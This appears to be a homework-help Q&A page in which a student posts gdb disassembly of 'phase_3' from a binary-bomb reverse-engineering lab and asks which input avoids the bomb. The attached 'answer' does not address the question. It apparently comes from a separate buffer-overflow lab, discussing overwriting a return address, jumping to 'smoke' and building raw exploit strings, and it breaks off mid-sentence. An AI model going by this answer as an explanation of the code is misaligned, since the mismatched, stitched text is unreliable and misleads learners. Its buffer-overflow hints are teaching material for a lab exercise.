Hey guys im going crazy on this assembly code.. could you please explain to me w
ID: 3565222 • Letter: H
Question
Hey guys im going crazy on this assembly code.. could you please explain to me whats happening and give me a example on input that doesn't go to exploit_bomb.
assembly code in phase_3:
=> 0x08048bc2 <+0>: sub $0x2c,%esp
0x08048bc5 <+3>: lea 0x18(%esp),%eax
0x08048bc9 <+7>: mov %eax,0xc(%esp)
0x08048bcd <+11>: lea 0x1c(%esp),%eax
0x08048bd1 <+15>: mov %eax,0x8(%esp)
0x08048bd5 <+19>: movl $0x804a519,0x4(%esp)
0x08048bdd <+27>: mov 0x30(%esp),%eax
0x08048be1 <+31>: mov %eax,(%esp)
0x08048be4 <+34>: call 0x8048850 <__isoc99_sscanf@plt>
0x08048be9 <+39>: cmp $0x1,%eax
0x08048bec <+42>: jg 0x8048bf3
0x08048bee <+44>: call 0x8049245
0x08048bf3 <+49>: cmpl $0x7,0x1c(%esp)
0x08048bf8 <+54>: ja 0x8048c36
0x08048bfa <+56>: mov 0x1c(%esp),%eax
0x08048bfe <+60>: jmp *0x804a2a8(,%eax,4)
0x08048c05 <+67>: mov $0x188,%eax
0x08048c0a <+72>: jmp 0x8048c47
0x08048c0c <+74>: mov $0x88,%eax
0x08048c11 <+79>: jmp 0x8048c47
0x08048c13 <+81>: mov $0x153,%eax
0x08048c18 <+86>: jmp 0x8048c47
0x08048c1a <+88>: mov $0x6b,%eax
0x08048c1f <+93>: jmp 0x8048c47
0x08048c21 <+95>: mov $0x1c1,%eax
0x08048c26 <+100>: jmp 0x8048c47
0x08048c28 <+102>: mov $0xfe,%eax
0x08048c2d <+107>: jmp 0x8048c47
0x08048c2f <+109>: mov $0x38f,%eax
0x08048c34 <+114>: jmp 0x8048c47
0x08048c36 <+116>: call 0x8049245
0x08048c3b <+121>: mov $0x0,%eax
0x08048c40 <+126>: jmp 0x8048c47
0x08048c42 <+128>: mov $0x106,%eax
0x08048c47 <+133>: cmp 0x18(%esp),%eax
0x08048c4b <+137>: je 0x8048c52
0x08048c4d <+139>: call 0x8049245
0x08048c52 <+144>: add $0x2c,%esp
0x08048c55 <+147>: ret
assembly code in <__isoc99_sscanf@plt> :
=> 0x8048850 <__isoc99_sscanf@plt>: jmp *0x804c058
0x8048856 <__isoc99_sscanf@plt+6>: push $0x98
0x804885b <__isoc99_sscanf@plt+11>: jmp 0x8048710
0x8048860 : jmp *0x804c05c
0x8048866 : push $0xa0
0x804886b : jmp 0x8048710
0x8048870 <__errno_location@plt>: jmp *0x804c060
0x8048876 <__errno_location@plt+6>: push $0xa8
--------------------------------------------------------------------------------
Breakpoint 3, 0x08048850 in __isoc99_sscanf@plt ()
gdb$ disas
Dump of assembler code for function __isoc99_sscanf@plt:
=> 0x08048850 <+0>: jmp *0x804c058
0x08048856 <+6>: push $0x98
0x0804885b <+11>: jmp 0x8048710
End of assembler dump.
hope this is understandable ..
regards mr.frustrated
Explanation / Answer
>> I guess I'm just not putting 2 and 2 together... I'm not sure how to use that information.
Well, you now know where the buffer starts :) And that information tells you how much data you need to write into the buffer to overwrite the return address.
>> How can I enter the address of smoke like this?
From the assignment :
>> Your exploit strings will typically contain byte values that do not correspond to the ASCII values for printing
>> characters. The program HEX 2 RAW can help you generate these raw strings. It takes as input a hex-formatted
>> string. In this format, each byte value is represented by two hex digits. For example, the string